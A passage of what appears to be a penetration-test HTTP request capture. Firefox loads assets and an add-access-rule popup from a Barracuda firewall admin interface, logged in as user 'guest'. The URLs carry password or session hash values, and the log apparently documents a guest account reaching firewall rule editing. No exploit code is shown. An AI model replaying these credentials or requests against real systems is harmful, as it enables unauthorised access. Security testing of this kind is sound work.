Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]

2:35:11.271[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/css/ext-all.css?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]

2:35:11.272[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/css/ext-ux.css?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]

2:35:11.273[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/css/bfw.css?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]

2:35:11.274[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/prototype.js?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]

2:35:11.276[0ms][total 0ms] Status: pending[]
GET
https://firewall.ptest.cudasvc.com/js/scriptaculous/scriptaculous.js?loa
d=effects,dragdrop&v=6.1.0.016
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]

2:35:11.277[0ms][total 0ms] Status: pending[]
GET
https://firewall.ptest.cudasvc.com/js/ext-prototype-adapter.js?v=6.1.0.0
16
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]

2:35:11.278[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-all.js?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]

2:35:11.280[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js_functions.js?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]

2:35:11.281[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-ux.js?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]

2:35:11.281[0ms][total 0ms] Status: pending[]
GET
https://firewall.ptest.cudasvc.com/js/prototype.helper.js?v=6.1.0.016
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]

2:35:11.282[0ms][total 0ms] Status: pending[]
GET
https://firewall.ptest.cudasvc.com/js/prototype.ajaxvalidation.js?v=6.1.
0.016
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]

2:35:11.284[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/utils.js?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]

2:35:11.284[0ms][total 0ms] Status: pending[]
GET
https://firewall.ptest.cudasvc.com/js/adapters/prototype-adapter.js?v=6.
1.0.016
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]

2:35:11.285[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/highcharts.js?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]

2:35:11.311[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/favicon.ico Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]

2:35:11.368[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/favicon.ico Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]

2:35:11.410[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/effects.js Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]

2:35:11.411[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/dragdrop.js Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]

2:35:11.633[1989ms][total 1989ms] Status: 200[OK]
GET https://firewall.ptest.cudasvc.com/cgi-mod/header_logo.cgi?6.1.0.016
Load Flags[LOAD_NORMAL] Content Size[-1] Mime Type[image/png]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]
Connection[keep-alive]
Response Headers:
Server[BarracudaFirewallHTTP 4.0]
Content-Type[image/png]
Transfer-Encoding[chunked]
Connection[keep-alive]
Expires[Tue, 01 Oct 2013 00:35:14 GMT]
Date[Tue, 01 Oct 2013 00:35:14 GMT]
Cache-Control[no-cache, no-store]

2:35:12.070[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/edit.png Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]

2:35:12.071[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/del.png Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]

2:35:12.071[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/clone.png Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]

2:35:12.072[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/bfw/serviceredirect.png
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]

2:35:12.072[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/red.png Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]

2:35:20.198[1858ms][total 2743ms] Status: 200[OK]
GET
https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aa
ca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_
tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&s
econdary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&isp
opup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=85
0
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content
Size[-1] Mime Type[text/html]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=L
ocal&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa3776
6&user=guest&primary_tab=FIREWALL]
Connection[keep-alive]
Response Headers:
Server[BarracudaFirewallHTTP 4.0]
Content-Type[text/html; charset=utf-8]
Transfer-Encoding[chunked]
Connection[keep-alive]
Expires[Mon, 01 Oct 2012 00:35:22 GMT]
Date[Tue, 01 Oct 2013 00:35:22 GMT]

2:35:20.376[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/default/grid/row-over.gif
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/css/ext-all.css?v=6.1.0.016]

2:35:22.084[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/prototype.js?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38
094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_se
condary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale
=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_li
fe=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_h
eight=850]

2:35:22.085[0ms][total 0ms] Status: pending[]
GET
https://firewall.ptest.cudasvc.com/js/scriptaculous/scriptaculous.js?loa
d=effects,dragdrop&v=6.1.0.016
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38
094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_se
condary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale
=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_li
fe=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_h
eight=850]

2:35:22.086[0ms][total 0ms] Status: pending[]
GET
https://firewall.ptest.cudasvc.com/js/ext-prototype-adapter.js?v=6.1.0.0
16
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38
094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_se
condary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale
=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_li
fe=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_h
eight=850]

2:35:22.087[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-all.js?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38
094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_se
condary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale
=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_li
fe=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_h
eight=850]

2:35:22.088[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js_functions.js?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38
094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_se
condary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale
=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_li
fe=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_h
eight=850]

2:35:22.089[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-ux.js?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38
094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_se
condary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale
=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_li
fe=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_h
eight=850]

2:35:22.090[0ms][total 0ms] Status: pending[]
GET
https://firewall.ptest.cudasvc.com/js/prototype.helper.js?v=6.1.0.016
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38
094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_se
condary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale
=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_li
fe=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_h
eight=850]

2:35:22.090[0ms][total 0ms] Status: pending[]
GET
https://firewall.ptest.cudasvc.com/js/prototype.ajaxvalidation.js?v=6.1.
0.016
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38
094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_se
condary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale
=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_li
fe=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_h
eight=850]

2:35:22.092[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/utils.js?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38
094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_se
condary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale
=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_li
fe=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_h
eight=850]

2:35:22.093[0ms][total 0ms] Status: pending[]
GET
https://firewall.ptest.cudasvc.com/js/adapters/prototype-adapter.js?v=6.
1.0.016
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38
094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_se
condary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale
=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_li
fe=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_h
eight=850]

2:35:22.094[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/highcharts.js?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38
094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_se
condary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale
=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_li
fe=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_h
eight=850]

2:35:22.094[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/barracuda.css?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38
094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_se
condary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale
=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_li
fe=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_h
eight=850]

2:35:22.095[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/css/ext-all.css?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
